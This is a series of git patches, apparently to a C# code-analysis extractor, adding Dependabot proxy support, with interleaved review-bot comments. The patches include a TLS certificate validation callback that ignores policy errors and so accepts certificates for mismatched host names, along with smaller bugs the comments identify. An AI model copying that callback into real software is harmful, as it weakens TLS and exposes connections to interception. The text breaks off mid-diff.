@@ -65,9 +65,9 @@ namespace Semmle.Extraction.CSharp.DependencyFetching logger.LogInfo($"Setting up Dependabot proxy at {this.Address}"); - startInfo.EnvironmentVariables["HTTP_PROXY"] = this.Address; - startInfo.EnvironmentVariables["HTTPS_PROXY"] = this.Address; - startInfo.EnvironmentVariables["SSL_CERT_FILE"] = this.certFile?.FullName; + startInfo.EnvironmentVariables.Add("HTTP_PROXY", this.Address); + startInfo.EnvironmentVariables.Add("HTTPS_PROXY", this.Address); + startInfo.EnvironmentVariables.Add("SSL_CERT_FILE", this.certFile?.FullName); } } } From e999ec1ecf8736a5815522df5ffd97f8c6a1061b Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Mon, 2 Dec 2024 14:17:06 +0000 Subject: [PATCH 0823/1267] C# Expose `CertificatePath` from `DependabotProxy` --- .../DependabotProxy.cs | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 462cde58c87..56bf08de9cc 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -16,6 +16,10 @@ namespace Semmle.Extraction.CSharp.DependencyFetching /// The full address of the Dependabot proxy, if available. /// internal readonly string? Address; + /// + /// The path to the temporary file where the certificate is stored. + /// + internal readonly string? CertificatePath; /// /// Gets a value indicating whether a Dependabot proxy is configured. 
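Review bot: Switching from the indexer to `EnvironmentVariables.Add(...)` in the `@@ -65,9 +65,9 @@` hunk makes `ApplyProxy` fail when the variable already exists. As far as I know, `Add` throws an `ArgumentException` for a duplicate key, and the collection is pre-populated from the parent environment, so a runner that already exports `HTTP_PROXY`, `HTTPS_PROXY` or `SSL_CERT_FILE` would break every `dotnet` invocation. The indexer form overwrites instead and is what the surrounding code uses for `DOTNET_CLI_UI_LANGUAGE`, so I would keep `startInfo.EnvironmentVariables["HTTP_PROXY"] = this.Address;` and the two matching lines. The `Add` calls are carried over unchanged into `DotNetCliInvoker.cs` in patch 0827.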
@@ -49,13 +53,13 @@ namespace Semmle.Extraction.CSharp.DependencyFetching var certDirPath = new DirectoryInfo(Path.Join(tempWorkingDirectory.DirInfo.FullName, ".dependabot-proxy")); Directory.CreateDirectory(certDirPath.FullName); - var certFilePath = Path.Join(certDirPath.FullName, "proxy.crt"); - this.certFile = new FileInfo(certFilePath); + this.CertificatePath = Path.Join(certDirPath.FullName, "proxy.crt"); + this.certFile = new FileInfo(this.CertificatePath); using var writer = this.certFile.CreateText(); writer.Write(cert); - logger.LogInfo($"Stored Dependabot proxy certificate at {certFilePath}"); + logger.LogInfo($"Stored Dependabot proxy certificate at {this.CertificatePath}"); } internal void ApplyProxy(ILogger logger, ProcessStartInfo startInfo) From 984091d4a4cf8fa4e44fed4f22a9cc9f1fa1191d Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Mon, 2 Dec 2024 14:18:24 +0000 Subject: [PATCH 0824/1267] C#: Propagate `DependabotProxy` instance down from `DependencyManager` --- .../DependabotProxy.cs | 2 +- .../DependencyManager.cs | 7 +++++-- .../Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs | 4 ++-- .../DotNetCliInvoker.cs | 4 ++-- .../NugetPackageRestorer.cs | 3 +++ 5 files changed, 13 insertions(+), 7 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 56bf08de9cc..207d19777cc 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -6,7 +6,7 @@ using Semmle.Util.Logging; namespace Semmle.Extraction.CSharp.DependencyFetching { - internal class DependabotProxy + public class DependabotProxy { private readonly string? host; private readonly string? port; 
diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs index 4866df1260e..de930867598 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs @@ -27,6 +27,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching private readonly ILogger logger; private readonly IDiagnosticsWriter diagnosticsWriter; private readonly NugetPackageRestorer nugetPackageRestorer; + private readonly DependabotProxy dependabotProxy; private readonly IDotNet dotnet; private readonly FileContent fileContent; private readonly FileProvider fileProvider; @@ -106,9 +107,11 @@ namespace Semmle.Extraction.CSharp.DependencyFetching return BuildScript.Success; }).Run(SystemBuildActions.Instance, startCallback, exitCallback); + dependabotProxy = new DependabotProxy(logger, tempWorkingDirectory); + try { - this.dotnet = DotNet.Make(logger, dotnetPath, tempWorkingDirectory); + this.dotnet = DotNet.Make(logger, dotnetPath, tempWorkingDirectory, dependabotProxy); runtimeLazy = new Lazy(() => new Runtime(dotnet)); } catch @@ -117,7 +120,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching throw; } - nugetPackageRestorer = new NugetPackageRestorer(fileProvider, fileContent, dotnet, diagnosticsWriter, logger, this); + nugetPackageRestorer = new NugetPackageRestorer(fileProvider, fileContent, dotnet, dependabotProxy, diagnosticsWriter, logger, this); var dllLocations = fileProvider.Dlls.Select(x => new AssemblyLookupLocation(x)).ToHashSet(); dllLocations.UnionWith(nugetPackageRestorer.Restore()); diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs index 439f00754dd..a82a0a47f41 100644 
--- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs @@ -27,11 +27,11 @@ namespace Semmle.Extraction.CSharp.DependencyFetching Info(); } - private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet"), tempWorkingDirectory), logger, tempWorkingDirectory) { } + private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy dependabotProxy) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet"), dependabotProxy), logger, tempWorkingDirectory) { } internal static IDotNet Make(IDotNetCliInvoker dotnetCliInvoker, ILogger logger) => new DotNet(dotnetCliInvoker, logger); - public static IDotNet Make(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory) => new DotNet(logger, dotNetPath, tempWorkingDirectory); + public static IDotNet Make(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy dependabotProxy) => new DotNet(logger, dotNetPath, tempWorkingDirectory, dependabotProxy); private void Info() { diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs index 597acc58259..cdadfe1f5b8 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs 
@@ -16,10 +16,10 @@ namespace Semmle.Extraction.CSharp.DependencyFetching public string Exec { get; } - public DotNetCliInvoker(ILogger logger, string exec, TemporaryDirectory tempWorkingDirectory) + public DotNetCliInvoker(ILogger logger, string exec, DependabotProxy dependabotProxy) { this.logger = logger; - this.proxy = new DependabotProxy(logger, tempWorkingDirectory); + this.proxy = dependabotProxy; this.Exec = exec; logger.LogInfo($"Using .NET CLI executable: '{Exec}'"); } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index f30760981f3..96ab9300bdf 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -20,6 +20,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching private readonly FileProvider fileProvider; private readonly FileContent fileContent; private readonly IDotNet dotnet; + private readonly DependabotProxy dependabotProxy; private readonly IDiagnosticsWriter diagnosticsWriter; private readonly TemporaryDirectory legacyPackageDirectory; private readonly TemporaryDirectory missingPackageDirectory; @@ -32,6 +33,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching FileProvider fileProvider, FileContent fileContent, IDotNet dotnet, + DependabotProxy dependabotProxy, IDiagnosticsWriter diagnosticsWriter, ILogger logger, ICompilationInfoContainer compilationInfoContainer) @@ -39,6 +41,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching this.fileProvider = fileProvider; this.fileContent = fileContent; this.dotnet = dotnet; + this.dependabotProxy = dependabotProxy; this.diagnosticsWriter = diagnosticsWriter; this.logger = logger; this.compilationInfoContainer = compilationInfoContainer; From ca251fb840ffdfcda228baa1dd90b7e678c02ee0 Mon Sep 17 00:00:00 2001 
From: "Michael B. Gale" Date: Mon, 2 Dec 2024 14:20:11 +0000 Subject: [PATCH 0825/1267] C#: Set up proxy for `IsFeedReachable`, if configured --- .../NugetPackageRestorer.cs | 23 ++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index 96ab9300bdf..dfa9349d426 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs @@ -3,7 +3,9 @@ using System.Collections.Concurrent; using System.Collections.Generic; using System.IO; using System.Linq; +using System.Net; using System.Net.Http; +using System.Security.Cryptography.X509Certificates; using System.Text; using System.Text.RegularExpressions; using System.Threading; @@ -591,7 +593,26 @@ namespace Semmle.Extraction.CSharp.DependencyFetching private bool IsFeedReachable(string feed, int timeoutMilliSeconds, int tryCount, bool allowExceptions = true) { logger.LogInfo($"Checking if Nuget feed '{feed}' is reachable..."); - using HttpClient client = new(); + + // Configure the HttpClient to be aware of the Dependabot Proxy, if used. + HttpClientHandler httpClientHandler = new(); + if (this.dependabotProxy.IsConfigured) + { + httpClientHandler.Proxy = new WebProxy(this.dependabotProxy.Address); + + if (!String.IsNullOrEmpty(this.dependabotProxy.CertificatePath)) + { + X509Certificate2 proxyCert = new X509Certificate2(this.dependabotProxy.CertificatePath); + httpClientHandler.ServerCertificateCustomValidationCallback = (message, cert, chain, _) => + { + chain.ChainPolicy.TrustMode = X509ChainTrustMode.CustomRootTrust; + chain.ChainPolicy.CustomTrustStore.Add(proxyCert); + return chain.Build(cert); + }; + } + } + + using HttpClient client = new(httpClientHandler); for (var i = 0; i < tryCount; i++) { 
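Review bot: The `ServerCertificateCustomValidationCallback` added in `IsFeedReachable` discards its fourth argument (the `SslPolicyErrors`) and returns only `chain.Build(cert)`. A certificate that chains to the proxy root but was issued for a different host name is therefore accepted, and a null `cert` or `chain` would throw inside the callback. I would accept the connection outright when the platform reported no errors, reject anything other than chain errors, and only then rebuild the chain against the proxy certificate, as sketched below; this needs `System.Net.Security` in scope. The callback is kept in the same form by the `@@ -600,13 +600,12 @@` hunk of patch 0826, which only swaps the certificate source. The body of `IsFeedReachable` continues outside the hunk.

```csharp
httpClientHandler.ServerCertificateCustomValidationCallback = (message, cert, chain, errors) =>
{
    // Nothing to repair if the platform already validated the certificate.
    if (errors == SslPolicyErrors.None) return true;

    // Only an untrusted chain may be fixed by trusting the proxy root;
    // a name mismatch or a missing certificate must still fail.
    if ((errors & ~SslPolicyErrors.RemoteCertificateChainErrors) != 0 || cert is null || chain is null)
    {
        return false;
    }

    chain.ChainPolicy.TrustMode = X509ChainTrustMode.CustomRootTrust;
    chain.ChainPolicy.CustomTrustStore.Add(proxyCert);
    return chain.Build(cert);
};
// … unchanged: HttpClient construction and retry loop …
```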
From ee7f0b0f2afb157a3ae2f52410ecd66e19cd414f Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Tue, 3 Dec 2024 18:47:47 +0000 Subject: [PATCH 0826/1267] C#: Load Dependabot Proxy certificate in `DependabotProxy`, and implement `IDisposable` --- .../DependabotProxy.cs | 17 ++++++++++++++++- .../DependencyManager.cs | 1 + .../NugetPackageRestorer.cs | 5 ++--- 3 files changed, 19 insertions(+), 4 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 207d19777cc..7d0f21d65b1 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -1,12 +1,13 @@ using System; using System.Diagnostics; using System.IO; +using System.Security.Cryptography.X509Certificates; using Semmle.Util; using Semmle.Util.Logging; namespace Semmle.Extraction.CSharp.DependencyFetching { - public class DependabotProxy + public class DependabotProxy : IDisposable { private readonly string? host; private readonly string? port; @@ -20,6 +21,10 @@ namespace Semmle.Extraction.CSharp.DependencyFetching /// The path to the temporary file where the certificate is stored. /// internal readonly string? CertificatePath; + /// + /// The certificate used for the Dependabot proxy. + /// + internal readonly X509Certificate2? Certificate; /// /// Gets a value indicating whether a Dependabot proxy is configured. @@ -60,6 +65,8 @@ namespace Semmle.Extraction.CSharp.DependencyFetching writer.Write(cert); logger.LogInfo($"Stored Dependabot proxy certificate at {this.CertificatePath}"); + + this.Certificate = new X509Certificate2(this.CertificatePath); } internal void ApplyProxy(ILogger logger, ProcessStartInfo startInfo) 
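Review bot: In the `@@ -60,6 +65,8 @@` hunk, `new X509Certificate2(this.CertificatePath)` reads the file while the `StreamWriter` from `using var writer = this.certFile.CreateText();` is still open. That writer is declared outside this hunk but visible in the earlier patches. A `using` declaration disposes only at the end of the enclosing scope, so the certificate text may still sit in the writer's buffer and the load can see an empty or truncated file, or fail on platforms that refuse to share the handle. I would close the file before loading it, for example by replacing the writer with `File.WriteAllText(this.CertificatePath, cert);`. The same ordering is carried into `GetDependabotProxy` by patch 0827.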
@@ -73,5 +80,13 @@ namespace Semmle.Extraction.CSharp.DependencyFetching startInfo.EnvironmentVariables.Add("HTTPS_PROXY", this.Address); startInfo.EnvironmentVariables.Add("SSL_CERT_FILE", this.certFile?.FullName); } + + public void Dispose() + { + if (this.Certificate != null) + { + this.Certificate.Dispose(); + } + } } } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs index de930867598..bbd5ecbd127 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs @@ -545,6 +545,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching public void Dispose() { nugetPackageRestorer?.Dispose(); + dependabotProxy.Dispose(); if (cleanupTempWorkingDirectory) { tempWorkingDirectory?.Dispose(); diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index dfa9349d426..a01b3ae9649 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs 
@@ -600,13 +600,12 @@ namespace Semmle.Extraction.CSharp.DependencyFetching { httpClientHandler.Proxy = new WebProxy(this.dependabotProxy.Address); - if (!String.IsNullOrEmpty(this.dependabotProxy.CertificatePath)) + if (this.dependabotProxy.Certificate != null) { - X509Certificate2 proxyCert = new X509Certificate2(this.dependabotProxy.CertificatePath); httpClientHandler.ServerCertificateCustomValidationCallback = (message, cert, chain, _) => { chain.ChainPolicy.TrustMode = X509ChainTrustMode.CustomRootTrust; - chain.ChainPolicy.CustomTrustStore.Add(proxyCert); + chain.ChainPolicy.CustomTrustStore.Add(this.dependabotProxy.Certificate); return chain.Build(cert); }; } From 2e80e09f52e2e8c1d4b54507dfca05e4bfd9d94e Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Thu, 5 Dec 2024 12:13:29 +0000 Subject: [PATCH 0827/1267] C#: Apply suggestions from code review for `DependabotProxy` --- .../DependabotProxy.cs | 75 ++++++++----------- .../DependencyManager.cs | 4 +- .../DotNet.cs | 4 +- .../DotNetCliInvoker.cs | 13 +++- .../NugetPackageRestorer.cs | 6 +- 5 files changed, 48 insertions(+), 54 deletions(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 7d0f21d65b1..d1a5df4dbc5 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs 
@@ -9,84 +9,71 @@ namespace Semmle.Extraction.CSharp.DependencyFetching { public class DependabotProxy : IDisposable { - private readonly string? host; - private readonly string? port; - private readonly FileInfo? certFile; + private readonly string host; + private readonly string port; /// /// The full address of the Dependabot proxy, if available. /// - internal readonly string? Address; + internal string Address { get; } /// /// The path to the temporary file where the certificate is stored. /// - internal readonly string? CertificatePath; + internal string? CertificatePath { get; private set; } /// /// The certificate used for the Dependabot proxy. /// - internal readonly X509Certificate2? Certificate; + internal X509Certificate2? Certificate { get; private set; } - /// - /// Gets a value indicating whether a Dependabot proxy is configured. - /// - internal bool IsConfigured => !string.IsNullOrEmpty(this.Address); - - internal DependabotProxy(ILogger logger, TemporaryDirectory tempWorkingDirectory) + internal static DependabotProxy? GetDependabotProxy(ILogger logger, TemporaryDirectory tempWorkingDirectory) { // Obtain and store the address of the Dependabot proxy, if available. 
- this.host = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyHost); - this.port = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyPort); + var host = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyHost); + var port = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyPort); if (string.IsNullOrWhiteSpace(host) || string.IsNullOrWhiteSpace(port)) { logger.LogInfo("No Dependabot proxy credentials are configured."); - return; + return null; } - this.Address = $"http://{this.host}:{this.port}"; - logger.LogInfo($"Dependabot proxy configured at {this.Address}"); + var result = new DependabotProxy(host, port); + logger.LogInfo($"Dependabot proxy configured at {result.Address}"); // Obtain and store the proxy's certificate, if available. var cert = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyCertificate); - if (string.IsNullOrWhiteSpace(cert)) + if (!string.IsNullOrWhiteSpace(cert)) { logger.LogInfo("No certificate configured for Dependabot proxy."); - return; + + var certDirPath = new DirectoryInfo(Path.Join(tempWorkingDirectory.DirInfo.FullName, ".dependabot-proxy")); + Directory.CreateDirectory(certDirPath.FullName); + + result.CertificatePath = Path.Join(certDirPath.FullName, "proxy.crt"); + var certFile = new FileInfo(result.CertificatePath); + + using var writer = certFile.CreateText(); + writer.Write(cert); + + logger.LogInfo($"Stored Dependabot proxy certificate at {result.CertificatePath}"); + + result.Certificate = new X509Certificate2(result.CertificatePath); } - var certDirPath = new DirectoryInfo(Path.Join(tempWorkingDirectory.DirInfo.FullName, ".dependabot-proxy")); - Directory.CreateDirectory(certDirPath.FullName); - - this.CertificatePath = Path.Join(certDirPath.FullName, "proxy.crt"); - this.certFile = new FileInfo(this.CertificatePath); - - using var writer = this.certFile.CreateText(); - writer.Write(cert); - - logger.LogInfo($"Stored Dependabot proxy certificate at 
{this.CertificatePath}"); - - this.Certificate = new X509Certificate2(this.CertificatePath); + return result; } - internal void ApplyProxy(ILogger logger, ProcessStartInfo startInfo) + private DependabotProxy(string host, string port) { - // If the proxy isn't configured, we have nothing to do. - if (!this.IsConfigured) return; - - logger.LogInfo($"Setting up Dependabot proxy at {this.Address}"); - - startInfo.EnvironmentVariables.Add("HTTP_PROXY", this.Address); - startInfo.EnvironmentVariables.Add("HTTPS_PROXY", this.Address); - startInfo.EnvironmentVariables.Add("SSL_CERT_FILE", this.certFile?.FullName); + this.host = host; + this.port = port; + this.Address = $"http://{this.host}:{this.port}"; } public void Dispose() { - if (this.Certificate != null) - { - this.Certificate.Dispose(); - } + this.Certificate?.Dispose(); } } } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs index bbd5ecbd127..cf4c6d73bd6 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs @@ -27,7 +27,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching private readonly ILogger logger; private readonly IDiagnosticsWriter diagnosticsWriter; private readonly NugetPackageRestorer nugetPackageRestorer; - private readonly DependabotProxy dependabotProxy; + private readonly DependabotProxy? dependabotProxy; private readonly IDotNet dotnet; private readonly FileContent fileContent; private readonly FileProvider fileProvider; 
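Review bot: After the condition was inverted to `if (!string.IsNullOrWhiteSpace(cert))` in `GetDependabotProxy`, the first statement inside the block is still `logger.LogInfo("No certificate configured for Dependabot proxy.");`. The message is now logged exactly when a certificate is configured, and nothing is logged when it is missing. I would move it to an `else` branch: `else { logger.LogInfo("No certificate configured for Dependabot proxy."); }`. That matters when diagnosing TLS failures, because the log otherwise says that no certificate is present and, two lines later, that one was stored.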
@@ -107,7 +107,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching return BuildScript.Success; }).Run(SystemBuildActions.Instance, startCallback, exitCallback); - dependabotProxy = new DependabotProxy(logger, tempWorkingDirectory); + dependabotProxy = DependabotProxy.GetDependabotProxy(logger, tempWorkingDirectory); try { diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs index a82a0a47f41..c1fdcc06e91 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNet.cs @@ -27,11 +27,11 @@ namespace Semmle.Extraction.CSharp.DependencyFetching Info(); } - private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy dependabotProxy) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet"), dependabotProxy), logger, tempWorkingDirectory) { } + private DotNet(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy? dependabotProxy) : this(new DotNetCliInvoker(logger, Path.Combine(dotNetPath ?? string.Empty, "dotnet"), dependabotProxy), logger, tempWorkingDirectory) { } internal static IDotNet Make(IDotNetCliInvoker dotnetCliInvoker, ILogger logger) => new DotNet(dotnetCliInvoker, logger); - public static IDotNet Make(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy dependabotProxy) => new DotNet(logger, dotNetPath, tempWorkingDirectory, dependabotProxy); + public static IDotNet Make(ILogger logger, string? dotNetPath, TemporaryDirectory tempWorkingDirectory, DependabotProxy? dependabotProxy) => new DotNet(logger, dotNetPath, tempWorkingDirectory, dependabotProxy); private void Info() { 
diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs index cdadfe1f5b8..19f0f3dbe0d 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DotNetCliInvoker.cs @@ -12,11 +12,11 @@ namespace Semmle.Extraction.CSharp.DependencyFetching internal sealed class DotNetCliInvoker : IDotNetCliInvoker { private readonly ILogger logger; - private readonly DependabotProxy proxy; + private readonly DependabotProxy? proxy; public string Exec { get; } - public DotNetCliInvoker(ILogger logger, string exec, DependabotProxy dependabotProxy) + public DotNetCliInvoker(ILogger logger, string exec, DependabotProxy? dependabotProxy) { this.logger = logger; this.proxy = dependabotProxy; @@ -42,7 +42,14 @@ namespace Semmle.Extraction.CSharp.DependencyFetching startInfo.EnvironmentVariables["DOTNET_SKIP_FIRST_TIME_EXPERIENCE"] = "true"; // Configure the proxy settings, if applicable. - this.proxy.ApplyProxy(this.logger, startInfo); + if (this.proxy != null) + { + logger.LogInfo($"Setting up Dependabot proxy at {this.proxy.Address}"); + + startInfo.EnvironmentVariables.Add("HTTP_PROXY", this.proxy.Address); + startInfo.EnvironmentVariables.Add("HTTPS_PROXY", this.proxy.Address); + startInfo.EnvironmentVariables.Add("SSL_CERT_FILE", this.proxy.CertificatePath); + } return startInfo; } diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs index a01b3ae9649..d0c0af6b768 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/NugetPackageRestorer.cs 
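Review bot: The three `EnvironmentVariables.Add(...)` calls added in the `@@ -42,7 +42,14 @@` hunk of DotNetCliInvoker.cs throw if the key already exists, unlike the indexer assignment used just above for `DOTNET_SKIP_FIRST_TIME_EXPERIENCE`; because a `ProcessStartInfo` environment is normally pre-populated from the parent process, a runner that already exports `HTTP_PROXY` or `HTTPS_PROXY` would likely fail here instead of being redirected to the Dependabot proxy. Assigning through the indexer, e.g. `startInfo.EnvironmentVariables["HTTP_PROXY"] = this.proxy.Address;`, overwrites the inherited value. `CertificatePath` appears to be set in `GetDependabotProxy` only when a certificate was supplied, so `SSL_CERT_FILE` is better guarded: `if (this.proxy.CertificatePath != null) startInfo.EnvironmentVariables["SSL_CERT_FILE"] = this.proxy.CertificatePath;`. The enclosing method starts outside the hunk.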
@@ -22,7 +22,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching private readonly FileProvider fileProvider; private readonly FileContent fileContent; private readonly IDotNet dotnet; - private readonly DependabotProxy dependabotProxy; + private readonly DependabotProxy? dependabotProxy; private readonly IDiagnosticsWriter diagnosticsWriter; private readonly TemporaryDirectory legacyPackageDirectory; private readonly TemporaryDirectory missingPackageDirectory; @@ -35,7 +35,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching FileProvider fileProvider, FileContent fileContent, IDotNet dotnet, - DependabotProxy dependabotProxy, + DependabotProxy? dependabotProxy, IDiagnosticsWriter diagnosticsWriter, ILogger logger, ICompilationInfoContainer compilationInfoContainer) @@ -596,7 +596,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching // Configure the HttpClient to be aware of the Dependabot Proxy, if used. HttpClientHandler httpClientHandler = new(); - if (this.dependabotProxy.IsConfigured) + if (this.dependabotProxy != null) { httpClientHandler.Proxy = new WebProxy(this.dependabotProxy.Address); From 7369d043ed1e9438e69cf9c4c7b4bdcd988e6465 Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Thu, 5 Dec 2024 12:25:45 +0000 Subject: [PATCH 0828/1267] C#: Don't initialise `DependabotProxy` on Windows or macOS --- .../DependabotProxy.cs | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index d1a5df4dbc5..09f5a15a21d 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs 
@@ -27,6 +27,13 @@ namespace Semmle.Extraction.CSharp.DependencyFetching internal static DependabotProxy? GetDependabotProxy(ILogger logger, TemporaryDirectory tempWorkingDirectory) { + // Setting HTTP(S)_PROXY and SSL_CERT_FILE have no effect on Windows or macOS, + // but we would still end up using the Dependabot proxy to check for feed reachability. + // This would result in us discovering that the feeds are reachable, but `dotnet` would + // fail to connect to them. To prevent this from happening, we do not initialise an + // instance of `DependabotProxy` on those platforms. + if (SystemBuildActions.Instance.IsWindows() || SystemBuildActions.Instance.IsMacOs()) return null; + // Obtain and store the address of the Dependabot proxy, if available. var host = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyHost); var port = Environment.GetEnvironmentVariable(EnvironmentVariableNames.ProxyPort); From 952488c2d843d2a0196311f638051b4026b8a32c Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Thu, 5 Dec 2024 12:32:55 +0000 Subject: [PATCH 0829/1267] C#: Fix possible null dereference --- .../DependencyManager.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs 